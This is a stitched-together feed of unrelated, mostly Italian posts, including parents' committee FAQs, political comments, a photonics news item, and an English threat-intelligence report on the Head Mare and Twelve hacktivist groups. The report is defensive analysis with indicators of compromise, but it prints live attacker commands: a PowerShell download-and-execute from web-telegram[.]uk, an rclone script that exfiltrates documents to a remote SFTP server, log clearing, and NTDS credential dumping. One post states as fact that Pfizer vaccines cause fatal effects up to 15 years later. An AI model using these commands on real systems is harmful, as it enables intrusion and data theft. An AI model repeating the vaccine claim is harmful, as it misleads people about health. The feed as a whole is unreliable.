Scuola di Liberalismo 2025: Giuseppe Benedetto e Marcello Saija – Le sfide dell’Europa a 70 anni dalla conferenza di Messina
@Politica interna, europea e internazionale
L'articolo Scuola di Liberalismo 2025: Giuseppe Benedetto e Marcello Saija – Le sfide dell’Europa a 70 anni dalla conferenza di Messina proviene da Fondazione
Politica interna, europea e internazionale reshared this.
L'avidità che ci comanda è solamente un male passeggero.
L'amarezza di uomini che temono le vie del progresso umano, l'odio degli uomini scompare e i dittatori muoiono
e il potere che hanno tolto al popolo, ritornerà al popolo.
E finchè gli uomini muoiono, la libertà non può essere soppressa.
Non arrendetevi di fronte ad uomini innaturali, uomini macchina, con macchine al posto del cervello e del cuore.
Voi non siete macchine, voi non siete bestie, siete uomini!
Voi, persone, avete il potere di rendere questa vita libera e bella di rendere questa vita un'avventura meravigliosa.
Permetteteci di usare quel potere,
uniamoci tutti", tratto da "The Great Dictator", un film del 1940 scritto, prodotto e interpretato da Charlie Chaplin.
sibilla asemica per Silvio Craia
(CC) 2021 differx
slowforward.net/2023/08/28/sib…
& differx.tumblr.com/post/777811…
Poliversity - Università ricerca e giornalismo reshared this.
A cosa serve il Comitato dei Genitori?
A cosa serve il Comitato dei Genitori?
Al fine di definire con la massima correttezza le funzioni del comitato, riportiamo uno stralcio del primo articolo del Regolamento del Comitato.
Il Comitato si propone i seguenti obiettivi:
1) Facilitare la convocazione dell'assemblea dei genitori.
2) Promuovere la partecipazione democratica dei genitori negli organi deputati.
3) Favorire la comunicazione fra le varie componenti della scuola all'insegna della più totale trasparenza.
4) Contribuire all'individuazione e all'analisi delle criticità - materiali e non - che dovessero emergere. nell'ambito scolastico, al loro monitoraggio, e alla formulazione di proposte di risoluzione percorribili
5) Vigilare sul rispetto dei diritti di genitori e studenti all’interno della scuola.
6) Favorire la conoscenza del Patto Educativo di Corresponsabilità e del Piano dell’Offerta Formativa redatti dall’Istituto presso genitori e studenti coinvolgendoli nel monitoraggio dell’efficacia e dell'attualità educativa.
Il Comitato si impegna nell'adempimento degli obiettivi prefissati attraverso le seguenti modalità operative:
1) La convocazione dell'"Assemblea dei genitori".
2) La redazione di comunicati pubblici o l'invio di comunicazioni mirate ai soggetti coinvolti nella gestione dell'Istituto.
3) La redazione di richieste di accesso a dati e documenti amministrativi, secondo le modalità previste dalla normativa.
4) L'organizzazione di gruppi di lavoro o la partecipazione a gruppi di lavoro istituiti da altre realtà, in merito alle tematiche di interesse per l'Istituto.
5) La promozione di incontri di formazione per genitori, aperti a docenti e studenti.
6) Il confronto e la collaborazione con i Comitati Genitori e Consigli di Istituto delle altre scuole. superiori della città, al fine di realizzare scambi di informazioni e di esperienze e di intraprendere eventuali iniziative comuni in collaborazione.
7) L'allestimento e la messa a disposizione di raccolte di documentazione di supporto per le famiglie o di rendiconto delle proprie attività.
8) La promozione e l'organizzazione di incontri formativi o di eventi ricreativi.
9) La formulazione di proposte e pareri (ex art. 3 c. 3 del DPR 275/99 c.d. Regolamento dell'Autonomia Scolastica) al Collegio Docenti e al Consiglio di Istituto ai fini della messa a punto del POF e dei progetti di sperimentazione.
10) La promozione di interventi di manutenzione dell'edificio scolastico
I genitori non rappresentanti possono partecipare alle attività del Comitato?
Anche i genitori non rappresentanti possono partecipare ai Gruppi di Lavoro costituiti dal Comitato.
I Gruppi di Lavoro attualmente operativi sono i seguenti:
1) Gruppo Comunicazione
Finalità: comunicazione pubblica delle attività del Comitato verso i genitori e verso la scuola, individuazione dei canali di comunicazione più appropriati, gestione strumenti digitali di comunicazione e archiviazione.
2) Gruppo Trasparenza.
Finalità: creare uno strumento per armonizzare l'attuale conoscenza da parte della componente genitori, delle norme scolastiche, delle delibere, dei regolamenti di funzionamento dell'Istituto scolastico
3) Gruppo Formazione.
Finalità: elaborazione di contenuti ed incontri formativi in merito alle tematiche di interesse generale per creare e performare uno strumento utile al coinvolgimento dei genitori come componente scolastica e supportare i rappresentanti delle classi nella comunicazione e nella formazione (anche) normativa.
Il vaccino Pfizer può causare effetti collaterali fatali fino a 15 ANNI dopo l'iniezione.
Un nuovo studio pubblicato sull'International Journal of Innovative Research in Medical Science documenta un decesso avvenuto 555 giorni dopo aver ricevuto il siero contro il coronavirus.
L'uomo di 47 anni, sano, è morto improvvisamente a causa di un'emorragia polmonare causata da un coagulo di sangue correlato al siero Pfizer.
Secondo i ricercatori, Peter McCullough e Nicolas Hulscher, pare che avesse ricevuto un numero di lotto appartenente a una delle serie di sieri più letali.
Il dott. McCullough ha affermato che questo è il primo caso documentato di un effetto collaterale fatale verificatosi più di un anno dopo un'iniezione di mRNA.
La FDA lo sapeva e ha comunque approvato i vaccini.
Documenti interni dimostrano che la stessa FDA ha riconosciuto che tali coaguli di sangue potrebbero verificarsi anche dopo 5-15 anni.
Fonte
https://t.me/radio28tv
Cos'è il Comitato dei Genitori?
Cos'è il Comitato dei Genitori?
Il Comitato dei Genitori è un'associazione prevista da sensi del Testo Unico delle disposizioni legislative in materia di istruzione (art. 15 comma 2 del D.L.vo 297/94). Possono essere membri dell'associazione solo i rappresentanti di classe eletti durante ciascun anno e i rappresentanti dei genitori eletti del Consiglio di Istituto.
Il Comitato dei Genitori può svolgere una funzione fondamentale per valorizzare il ruolo di tutti genitori e per rafforzare la loro partecipazione diretta e indiretta negli organismi scolastici.
I genitori infatti devono maturare la consapevolezza che i membri del Comitato, in quanto rappresentanti di classe, sono di fatto eletti dai genitori delle singole classi in occasione del primo consiglio di classe dell'anno.
Il Comitato dei Genitori, di cui fanno parte anche i quattro genitori eletti come rappresentanti in Consiglio di Istituto, è anche un formidabile strumento di connessione tra essi e tutti gli altri genitori.
Infine, il Comitato dei Genitori possiede un'ultima prerogativa formale molto importante per la partecipazione di tutti i genitori, ossia la possibilità di convocare più facilmente l'Assemblea dei Genitori. Solo se esiste un Comitato dei Genitori è infatti possibile convocare l'assemblea su richiesta della metà dei rappresentanti eletti, invece che con la raccolta di 300 firme. L'assemblea plenaria di tutti i genitori della scuola costituisce l'unica occasione prevista dalla normativa per discutere collettivamente le istanze presentate dai genitori.
linkiesta.it/2025/03/tesla-fra…
però onestamente è evidente che abbiamo tutti perso il cervello. non mi vien nessun'altra considerazione. rimane qualcuno con la testa sulle spalle?
tipo distinguere per iniziare almeno i problemi dalle cazzate? cosa cambia il mondo e cosa no? non è semplicemente "dare l'esempio". proprio no. è più complicato di così. perché dipende dalla scala con cui agisci. ---> e quando il politico si limita a fare il "buon cittadino" e pensa con questi di aver assolto il suo dovere verso l a società, e che basti questo per il suo ruolo, è davvero finita. <--- se non altro per coerenza questo spiega come mai pensiamo che i politici per il lavoro che fanno non dovrebbero neppure essere pagati... un po' come i giornalisti che scrivono che "l'incidente alla centrale di fukyushima" ha provocato il maremoto.
un po' come l'impero romano che passò dalla repubblica all'impero, così gli stati uniti sono passati dalla democrazia all'uomo unico al potere, appoggiato da è evidente chi.
High-Speed Reservoir Computing With Integrated Laser Graded Artificial Neurons
So-called neuromorphic computing involves the use of physical artificial neurons to do computing in a way that is inspired by the human brain. With photonic neuromorphic computing these artificial neurons generally use laser sources and structures such as micro-ring resonators and resonant tunneling diodes to inject photons and modulate them akin to biological neurons.
One limitation of photonic artificial neurons was that these have a binary response and a refractory period, making them unlike the more versatile graded neurons. This has now been addressed by [Yikun Nie] et al. with their research published in Optica.
The main advantage of graded neurons is that they are capable of analog graded responses, combined with no refractory period in which the neuron is unresponsive. For the photonic version, a quantum dot (QD) based gain section was constructed, with the input pulses determining the (analog) output.
Multiple of these neurons were then combined on a single die, for use in a reservoir computing configuration. This was used with a range of tests, including arrhythmia detection (98% accuracy) and handwriting classification (92% accuracy). By having the lasers integrated and the input pulses being electrical in nature, this should make it quite low-power, as well as fast, featuring 100 GHz QD lasers.
Pianificare il disaster recovery: strategie e soluzioni
@Informatica (Italy e non Italy 😁)
La resilienza aziendale come risultato della pianificazione integrata e/o dinamica delle continuità di business e del disaster recovery, il ripristino “post-disastro”
L'articolo Pianificare il disaster recovery: strategie e soluzioni proviene da Cyber Security 360.
#Cybersecurity360 è la testata
Informatica (Italy e non Italy 😁) reshared this.
eh beh certo... lui valuterebbe positivamente l'annessione alla russia.
Head Mare and Twelve join forces to attack Russian entities
Introduction
In September 2024, a series of attacks targeted Russian companies, revealing indicators of compromise and tactics associated with two hacktivist groups: Head Mare and Twelve. Our investigation showed that Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents. This suggests potential collaboration and joint campaigns between the two groups.
The attackers continue to refine their methods, employing both familiar tools from past Head Mare incidents and new PowerShell-based tools.
This report analyzes the software and techniques observed in recent Head Mare attacks and how these overlap with Twelve’s activities. The focus is on Head Mare’s TTPs and their evolution, with notes on commonalities with Twelve’s TTPs.
Technical details
Head Mare’s toolkit
The attackers used various publicly available tools, including open-source software and leaked proprietary tools, to achieve their goals.
- mimikatz;
- ADRecon;
- secretsdump;
- ProcDump;
- Localtonet;
- revsocks;
- ngrok;
- cloudflared;
- Gost;
- fscan;
- SoftPerfect Network Scanner;
- mRemoteNG;
- PSExec;
- smbexec;
- wmiexec;
- LockBit 3.0;
- Babuk.
Some of these tools were mentioned in our previous report on Head Mare, while others were new to their arsenal.
Notable new tools
Among the tools used by Head Mare were some not previously employed by the hacktivists but seen in attacks by other groups. For instance, they used the CobInt backdoor for remote access to domain controllers, previously observed only in Twelve’s attacks on Russian companies. This is an interesting fact, suggesting that Twelve and Head Mare may be sharing tools.
In addition to CobInt, the attackers used their own PhantomJitter backdoor, installed on servers for remote command execution. This tool appeared in the group’s arsenal in August 2024. We described its modus operandi in a story accessible to the subscribers of our Threat Intelligence reports.
Another new tactic involved a tool for remote command execution on a business automation platform server. Thus, the attackers used both proven and new tools, demonstrating flexibility and adaptability.
Initial Access
While previous Head Mare attacks relied solely on phishing emails with malicious attachments, they now also infiltrate victims’ infrastructure through compromised contractors with access to business automation platforms and RDP connections. This confirms the trend of hacktivists exploiting trusted relationships (T1199 – Trusted Relationship and T1078 – Valid Accounts).
The attackers also exploited software vulnerabilities, most commonly CVE-2023-38831 in WinRAR through phishing emails. In one incident, they exploited the Microsoft Exchange server vulnerability CVE-2021-26855 (ProxyLogon). Although patched in 2021, this vulnerability is still exploitable due to organizations using outdated operating systems and software. Our telemetry data revealed domain controllers still running Microsoft Windows Server 2012 R2 Server Standard x64 or, as in the aforementioned incidents, Microsoft Exchange Server 2016 used for email.
The attackers used ProxyLogon to execute a command to download and launch CobInt on the server.
Persistence
The method of establishing persistence has changed. Instead of creating scheduled tasks, the attackers now create new privileged local users on a business automation platform server. They use these accounts to connect to the server via RDP to transfer and execute tools interactively.
They also install traffic tunneling tools like Localtonet for persistent access to the target host. They made Localtonet persistent with the help of Non-Sucking Service Manager (NSSM), which allows running any application as a Windows service, as well as monitoring and restarting it if it fails for some reason. This user-friendly tool is often used legitimately to install and manage programs that cannot function as services. Localtonet and NSSM help the malicious actor to maintain continuous access to the infected host.
Anti-detection techniques
Head Mare continued to use the Masquerading technique (T1655), naming utility executables like standard operating system files. The investigation found files such as:
| Software | Path in the system |
| Cloud storages sync tool rclone | C:\ProgramData\wusa.exe |
| PhantomJitter | C:\Windows\System32\inetsrv\calc.exe |
| cloudflared | C:\Windows\System32\winuac.exe |
| Gost | C:\Windows\System32\winsw.exe |
In one incident, cmd.exe was renamed to log.exe and launched from C:\Users\[username]\log.exe.
Besides renaming files, the attackers also removed services and files they had created and cleared event logs to evade detection. Relevant artifacts were found in the PowerShell command history on attacked machines:
stop-service -name <servicename>
remove-service -name <servicename>
remove-service -name "<servicename>"
sc stop <servicename>
sc delete <servicename>
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
The ransomware executable also cleared system logs, as evidenced by a flag in the configuration of the samples that we have analyzed.
Command and Control
After exploiting the business automation platform server, attackers downloaded and installed the PhantomJitter backdoor. In the incidents we observed, the backdoor was downloaded into the victims’ infrastructure from the following URLs:
http[:]//45.87.246[.]34:443/calc.exe
http[:]//185.158.248[.]107:443/calc.exe
The file was saved in the local directory as c.exe. Upon launch, it connected to the C2 server, allowing the operator to execute commands on the compromised host.
In addition to PhantomJitter, the attackers used CobInt, whose payload connected to the following C2 server:
360nvidia[.]com
The domain resolves to the IP address 45.156.27[.]115.
Pivoting
The group expanded its arsenal to achieve their objectives at this stage. To gain remote access to the compromised infrastructure, they used a custom PowerShell script named proxy.ps1 to install and configure cloudflared and Gost.
Gost is a lightweight, powerful proxy utility offering various network routing and traffic hiding capabilities. It supports multiple protocols and can create secure communication channels, bypass blocks, and establish tunnels.
Cloudflared tunnels traffic through the Cloudflare network. It establishes a secure connection to an attacker-controlled Cloudflare server, acting as a proxy for C2 communication. This bypasses network restrictions like NAT (Network Address Translation) and firewall rules that might hinder direct connections between the victim host and attacker servers.
The proxy.ps1 script can also download archives from URLs specified on a command line and extract them to a temporary folder. Below is the help output for the script:
Usage: .\proxy.ps1 -r https://<site>.com/archive.zip -p gost_port -t cloudflared_token
Parameters:
-l Extract archive locally.
-r Download and extract archive remotely.
-p Specify the port for the gost.
-t Specify the token for the cloudflared.
-u Uninstall gost & cloudflared.
-h Show this help message.
The script defines constants for filenames, installing cloudflared and Gost with names mimicking standard Windows services in the C:\Windows\System32 folder. The script uses the GetTempFileName function to obtain temporary file paths.
$archivePath = "win.zip"
$filesPath = "C:\Windows\System32"
$cloudflaredPath = Join-Path -Path $filesPath -ChildPath "winuac.exe"
$gostPath = Join-Path -Path $filesPath -ChildPath "winsw.exe"
$winswPath = Join-Path -Path $filesPath -ChildPath "winsws.exe"
$winswxmlPath = Join-Path -Path $filesPath -ChildPath "winsws.xml"
$tempFile = [System.IO.Path]::GetTempFileName()
If the -p flag is specified in the command line, a service for the Gost tool will be installed on the system. The following function is used for this:
function Setup-Gost-Service {
# Set port
[xml]$winswxml = Get-Content $winswxmlPath
$winswxml.service.arguments = $winswxml.service.arguments -replace '42716', $p
$winswxml.Save($winswxmlPath)
Write-Host "
# Service install
Write-Host "
Start-Process $winswPath -ArgumentList "install" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $winswPath -ArgumentList "start" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
}
In this code snippet, the script installs the Gost executable file as a service and passes necessary settings to it.
If -t key is passed to the script, it installs and configures cloudflared in the system.
function Setup-Cloudflared-Service {
# Service install
Write-Host "
Start-Process $cloudflaredPath -ArgumentList "service install $t" -RedirectStandardError $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
}
In this code snippet, the script installs the cloudflared service and passes settings to it by means of the command line.
In addition to installing and configuring tunneling tools, the script has the ability to remove the artifacts they leave behind. The script can also stop and uninstall the cloudflared and Gost services, if the -u parameter is passed to it when it launches.
if ($u) {
Write-Host "
Start-Process sc.exe -ArgumentList "stop winsw" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $winswPath -ArgumentList "uninstall" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Write-Host "
Uninstalling cloudflared"Start-Process sc.exe -ArgumentList "stop winuac" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $cloudflaredPath -ArgumentList "service uninstall" -RedirectStandardError $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
$filePaths = @(
"C:\Windows\System32\winsws.wrapper.log",
"C:\Windows\System32\winsws.err.log",
"C:\Windows\System32\winsws.out.log",
"C:\Windows\System32\winsws.xml",
"C:\Windows\System32\winsws.exe",
"C:\Windows\System32\winsw.exe",
"C:\Windows\System32\winuac.exe"
)
foreach ($filePath in $filePaths) {
if (Test-Path $filePath) {
Remove-Item -Path $filePath -Force
Write-Output "
} else {
Write-Output " File not found: $filePath"
}
}
}
After deleting the services, the script deletes executables, configuration files, and logs of the tools.
In one incident, the attackers downloaded cloudflared and Gost from the server 45[.]156[.]21[.]148, which we previously saw in Head Mare attacks. An example download link is:
hxxp://45[.]156[.]21[.]148:8443/winuac.exe
Besides cloudflared and Gost, the attackers used cloud tunnels like ngrok and Localtonet. Localtonet is a reverse proxy server providing internet access to local services. The attackers launched it as a service using NSSM, downloading both tools from the official Localtonet website (localtonet[.]com).
hxxp://localtonet[.]com/nssm-2.24.zip
hxxp://localtonet[.]com/download/localtonet-win-64.zip
After downloading, they extracted the tools and launched them with these parameters:
nssm.exe install Win32_Serv
localtonet.exe authtoken <token>
These commands allow installing Localtonet as a service and authorizing it with a token for configuration.
Reconnaissance
The attackers used common system reconnaissance tools like quser.exe, tasklist.exe, and netstat.exe on local hosts. They primarily used fscan and SoftPerfect Network Scanner for local network reconnaissance, along with ADRecon, a tool for gathering information from Active Directory. ADRecon is a PowerShell script not previously observed in the group’s arsenal.
The attackers also used ADRecon to study the Active Directory domain, including computers, accounts, groups, and trust relationships between domains. The command history showed various domains passed as arguments to the script:
.\ADRecon.ps1 -DomainController <FQDN A>
.\ADRecon.ps1 -DomainController <FQDN B>
.\ADRecon.ps1 -DomainController <FQDN C>
<..>
Privilege Escalation
The attackers exploited previously compromised accounts of victims and their contractors, and created privileged local accounts, particularly when exploiting the business automation software server. If a user has sufficient permissions to remotely execute commands on the server, this software allows running a child command prompt process, such as cmd.exe, with privileges in the operating system corresponding to the program’s privileges. Since business automation software typically has administrator privileges in the OS, the child process also becomes privileged. The attackers exploited this opportunity: after gaining access to the vulnerable software server, they created a privileged local account on whose behalf they launched a command interpreter.
Command Execution
The attackers launched the Windows command interpreter on the business automation platform server in the target system within a process that executed the following command line:
cmd /c powershell.exe -ep bypass -w hidden -c iex ((New-Object
Net.WebClient).DownloadString('http://web-telegram[.]uk/vivo.txt')) > $temp\v8_B5B0_11.txt
This command downloads and executes the vivo.txt file, which we were unable to obtain. However, based on system events, we suspect that it opened a reverse shell, which the operator used to create two files in the target system.
c:\programdata\microsoftdrive\mcdrive.vbs
c:\programdata\microsoftdrive\mcdrive.ps1
Then, using reg.exe, the attackers added an autorun entry to execute mcdrive.vbs with the interpreter wscript.exe.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "mcdrivesvc" /t
REG_EXPAND_SZ /d "wscript.exe \"$appdata\MicrosoftDrive\mcdrive.vbs
The VBS file is an obfuscated Visual Basic script that creates an ActiveX object reference named WScript.Shell and uses its Run() function to execute an obfuscated command line.
A deobfuscated command line snippet follows:
%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -NoLogo -
NonInteractive -NoProfile -w hidden -c iex
([System.IO.File]::ReadAllText('C:\ProgramData\MicrosoftDrive\mcdrive.ps1'))
This command reads and executes the C:\ProgramData\MicrosoftDrive\mcdrive.ps1 file through the PowerShell interpreter. This file is a CobInt loader, previously seen only in Twelve’s arsenal. The mcdrive.ps1 snippet below determines the operating system’s bitness, decrypts, and executes the payload, which initiates a request to a C2 server at 360nvidia[.]com. The image below shows a graph obtained from analysis in the Cloud Sandbox on our Threat Intelligence Portal.
Payload execution analysis graph. The IP address shown on the graph corresponds to the domain 360nvidia.com
Credential Access
The investigation identified tools for obtaining credentials. Besides the publicly available mimikatz utility, the attackers used secretsdump and ProcDump. Secretsdump was found on one victim’s system at the following paths:
[USERNAME]\Desktop\secretsdump.exe
[USERNAME]\Desktop\secretsdump (1).exe
A new Go-based sample named update.exe was also discovered, enabling the dumping of the ntds.dit file and the SYSTEM/SECURITY registry hive using ntdsutil.exe.
powershell ntdsutil.exe "'ac i ntds'" 'ifm' "'create full temp'" q q
Additionally, manual PowerShell commands were observed for dumping data from these locations.
ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp1' q q
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
While no traces of the first command’s successful execution were found, the results of the second one were located at the following paths:
\temp\Active Directory
\temp\registry
\temp\Active Directory\ntds.dit
\temp\Active Directory\ntds.jfm
\temp\registry\SECURITY
\temp\registry\SYSTEM
\temp\[REDACTED].zip
Lateral Movement
The attackers used RDP to connect to systems, including with privileged accounts. They connected to NAS servers via SSH and used tools like mRemoteNG, smbexec, wmiexec, PAExec, and PsExec for remote host communication.
Data Collection and Exfiltration
Another new tool in Head Mare’s arsenal was a script running wusa.exe. Normally, this file name is used by the legitimate Windows update process. However, the script’s launch parameters indicated that the file was actually the rclone.exe utility. Rclone is an open-source project for copying and synchronizing files between storages of different types, making it convenient for data transfer.
@echo off
setlocal enabledelayedexpansion
set inputFile=C:\ProgramData\1.txt
for /f "tokens=*" %%A in (%inputFile%) do (
set hostname=%%A
start /wait "" C:\ProgramData\wusa.exe --config="C:\ProgramData\1.conf" --sftp-socks-proxy <username>:<password>@64.7.198.109:80 sync "\\%%A\C$\Users" sftpP:/data/<path> -q --ignore-existing --auto-confirm --include "*.doc" --include "*.docx" --include "*Desktop/**" --include "*Documents/**" --include "*Downloads/**" --include "*.pdf" --include "*.xls" --include "*.xlsx" --include "*.zip" --include "*.rar" --include "*.txt" --include "*.pn*" --include "*.ppt" --include "*.pptx" --include "*.jp*" --include "*.eml" --include "*.pst" --multi-thread-streams 12 --transfers 12 --max-age 3y --max-size 1G
)
endlocal
The script starts by taking the file 1.txt as input, which contains a list of hosts. For each host, it runs rclone.exe to transfer files from the device to an SFTP server through a SOCKS proxy. The attackers only exfiltrated files from specific directories or files matching the extension templates specified in the script.
Final goal: file encryption
As in previous attacks, they encrypted data using variants of LockBit 3.0 (for Windows systems) and Babuk (for NAS devices). The investigation found that the LockBit file was initially saved on the victim’s host at the following paths:
- C:\Users\{username}\Desktop\locker.exe;
- С:\Windows\SYSVOL\Intel\locker.exe.
Below is a sample ransom note, with the cybercriminals’ contacts redacted:
Contents of a LockBit ransom note
Connection between Head Mare and Twelve
In addition to the aforementioned TTPs, we attribute these attacks to Head Mare based on the following characteristics:
- A previously seen IP address:
- 45.156.21[.]148
- Malware:
- PhantomJitter
Further details about these indicators can be found in the private report on the Threat Intelligence Portal: “HeadMare’s new PhantomJitter backdoor dropped in attacks exploiting Microsoft Exchange”.
However, the presence of Twelve’s tools like CobInt suggests collaboration. To test this hypothesis, activity cluster diagrams were created based on the Diamond Model framework. Overlaps – common elements in the tactics of both groups – are highlighted in red, indicating potential coordination.
Analysis of the Head Mare techniques and tools
In the image above, we see for the first time the use of the CobInt malware in Head Mare attacks. Previously, it was present only in the arsenal of the Twelve group, the analysis of which is presented below.
Analysis of the Twelve techniques and tools
Also, the analysis of the two models revealed overlaps in the infrastructure (C2s) of the groups. The following infrastructure elements appearing in Head Mare attacks were also present in a number of incidents related to the activities of the Twelve group.
- 360nvidia[.]com;
- 45.156.27[.]115
In addition, we have identified other similarities in the arsenal of the two groups:
- File names:
- proxy.ps1
- ad_without_dc.ps1
- Paths:
- C:\Windows\System32\winsw.exe
- C:\Windows\System32\winsws.exe
- C:\Windows\System32\winuac.exe
- Service names:
- winsw (Microsoft Windows Update)
- winuac (Microsoft UAC Service Wrapper)
- Victims:
- Manufacture, government, energy
The final intersection points of the Head Mare and Twelve groups are shown in the image below. Given the overlaps in infrastructure, TTPs, CobInt malware, and victim choices, we assume that these groups act together, exchanging access to command-and-control servers and various tools for carrying out attacks.
Overlaps in TTPs, tools, and infrastructure between Head Mare and Twelve
Conclusion
Head Mare is actively expanding its set of techniques and tools. In recent attacks, they gained initial access to the target infrastructure by not only using phishing emails with exploits but also by compromising contractors.
They also use tools previously seen in attacks by other groups, such as Twelve’s CobInt backdoor.
This is not the only similarity between the two groups. In addition to the toolkit, the following were noticed:
- Shared command-and-control servers: 360nvidia[.]com, 45.156.27[.]115
- PowerShell scripts accessing these C2 servers: mcdrive.ps1
- Scripts for tunneling network connections: proxy.ps1
Based on the factors described above, we assume that Head Mare is working with Twelve to launch attacks on state- and privately controlled companies in Russia. We will continue to monitor the activity of the attackers and share up-to-date information about their TTPs. More details about the hacktivists’ activities and their tools, such as PhantomJitter, can be found in the materials available to subscribers of our Threat Intelligence reports.
Indicators of compromise
Please note: the network addresses given in this section were valid at the time of publication but may become outdated in the future.
Hashes:
| 6008E6C3DEAA08FB420D5EFD469590C6 | ADRecon.ps1 |
| 09BCFE1CCF2E199A92281AADE0F01CAF | calc.exe, c.exe |
| 70C964B9AEAC25BC97055030A1CFB58A | locker.exe |
| 87EECDCF34466A5945B475342ED6BCF2 | mcdrive.vbs |
| E930B05EFE23891D19BC354A4209BE3E | mimikatz.exe |
| C21C5DD2C7FF2E4BADBED32D35C891E6 | proxy.ps1 |
| 96EC8798BBA011D5BE952E0E6398795D | secretsdump.exe, secretsdump (1).exe |
| D6B07E541563354DF9E57FC78014A1DC | update.exe |
File paths:
С:\Windows\SYSVOL\Intel\locker.exe
C:\ProgramData\MicrosoftDrive\mcdrive.ps1
C:\ProgramData\MicrosoftDrive\mcdrive.vbs
C:\ProgramData\proxy.ps1
C:\ProgramData\wusa.exe
C:\Users\{USERNAME}\AppData\Roaming\1.bat
C:\Users\{USERNAME}\AppData\Roaming\Microsoft\Windows\Recent\mimikatz.lnk
C:\Users\{USERNAME}\AppData\Roaming\proxy.ps1
C:\Users\{USERNAME}\Desktop\Обработка.epf
C:\Users\{USERNAME}\Desktop\ad_without_dc.ps1
C:\Users\{USERNAME}\Desktop\ADRecon.ps1
C:\Users\{USERNAME}\Desktop\h.txt
C:\Users\{USERNAME}\Desktop\locker.exe
C:\Users\{USERNAME}\Desktop\mimikatz.exe
C:\Users\{USERNAME}\Desktop\mimikatz.log
C:\Users\{USERNAME}\Desktop\secretsdump (1).exe
C:\Users\{USERNAME}\Desktop\secretsdump.exe
C:\Users\{USERNAME}\Downloads\mimikatz-master.zip
C:\users\{USERNAME}\log.exe
C:\windows\adfs\ar\update.exe
C:\windows\system32\inetsrv\c.exe
C:\windows\system32\inetsrv\calc.exe
C:\windows\system32\winsw.exe
C:\Windows\System32\winsws.exe
C:\windows\system32\winuac.exe
C:\Windows\SYSVOL\Intel\mimikatz.exe
IP addresses and domain names:
360nvidia[.]com
web-telegram[.]uk
45.156.27[.]115
45.156.21[.]148
185.229.9[.]27
45.87.246[.]34
185.158.248[.]107
64.7.198[.]109
La lista:
Pubblicazione di informazioni inaccurate
Raccolta e presentazione originale delle informazioni
Chiarezza nella distinzione tra notizie e opinioni
Precisione dei titoli, inclusa l’assenza di clickbait
Trasparenza sulla proprietà del sito e sulle posizioni politiche dei proprietari
leggendo la lista non vengono i brividi vedendo cosa passa in italia?
E poi mi devo sentire dire che il mio nemico non è la russia ma l'UE... questa non è una forma di guerra? e poi i russi sulla TV loro fanno pure le vittime...
Un preoccupante aumento dei falsi report giornalistici
NewsGuard Technologies è stata fondata nel 2018 da Steven Brill e L. Gordon Crovitz. Si tratta di un'organizzazione che ha inventato un sistema di valutazione e classificazione per siti che diffondono a vario titolo notizie e informazioni.maicolengel butac (Butac – Bufale Un Tanto Al Chilo)
Simon Perry likes this.
guardacaso le guerre le cominciano sempre "gli uomini soli al potere..."... per non dimenticare. ma che cavolo ci facevamo noi in africa? fosse stato almeno per un buon motivo. almeno da difensori. ma da aggressori è proprio intollerabile.
"https://www.youtube.com/watch?v=MvoFfGgUWkI&t=14s"
Israele sviluppa uno strumento come ChatGPT per sorvegliare i palestinesi
@Notizie dall'Italia e dal mondo
L'esercito israeliano sta costruendo un modello linguistico di intelligenza artificiale utilizzando milioni di conversazioni intercettate tra palestinesi, che potrebbero accelerare il processo di incriminazione e arresto, rivela un'indagine congiunta.
Notizie dall'Italia e dal mondo reshared this.
Ragazzi, Pronti per i Workshop della RHC Conference? Scopriamo assieme Deepfake, AI, Darkweb, Ethical Hacking, Doxing e Cyberbullismo
Giovedì 8 maggio, la Red Hot Cyber Conference 2025 ospiterà un’intera giornata dedicata ai ragazzi con i Workshop Hands-on (organizzati in collaborazione con Accenture Italia). Si tratta di un’opportunità unica e gratuita per immergersi nel mondo della cybersecurity e della tecnologia in modo pratico e interattivo. Vista la folla dello scorso anno che ha assalito la conferenza durante i workshop, questo anno i workshop si svolgeranno all’interno del teatro che mette ben 800 posti a disposizione.
L’evento si terrà a Roma, presso il Teatro Italia, con accoglienza a partire dalle 11:00 dando modo alle scolaresche che arrivano da fuori Roma di accedere alla manifestazione nei tempi. Il Teatro Italia dista solo 20 minuti a piedi dalla Stazione Termini e 6 minuti a piedi dalla Metro B di Piazza Bologna (circa 600 metri).
L’inizio dei workshop è fissato alle 11:30. Questa giornata sarà dedicata a tutti i ragazzi delle scuole medie, superiori ed università o banalmente dei curiosi che si vorranno immergere nella tecnologia e nella sicurezza informatica in modo pratico, interattivo e coinvolgente.
Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio
Come lo faremo
Non solo parole, ma attraverso l’esperienza diretta! Attraverso sessioni tecniche immersive, i ragazzi avranno l’opportunità di sperimentare in prima persona come gli hacker etici testano le vulnerabilità di un sito web, come l’intelligenza artificiale può essere utilizzata per riconoscere oggetti o analizzare deepfake, e come affrontare problemi specifici di cybersecurity. Inoltre, esploreranno il Dark Web in modo sicuro, comprendendo l’importanza dell’Open Source Intelligence (OSINT) e della Cyber Threat Intelligence oltre a parlare di Doxing e Cyberbullismo.
Questa iniziativa avrà la caratteristica “hands on”. In informatica, l’espressione “hands-on” si riferisce a un approccio pratico e concreto all’apprendimento o all’esecuzione di specifici compiti. Significa letteralmente “mani sopra” e implica l’effettiva manipolazione, sperimentazione o applicazione di conoscenze o abilità in un contesto pratico anziché limitarsi a una comprensione teorica o astratta.
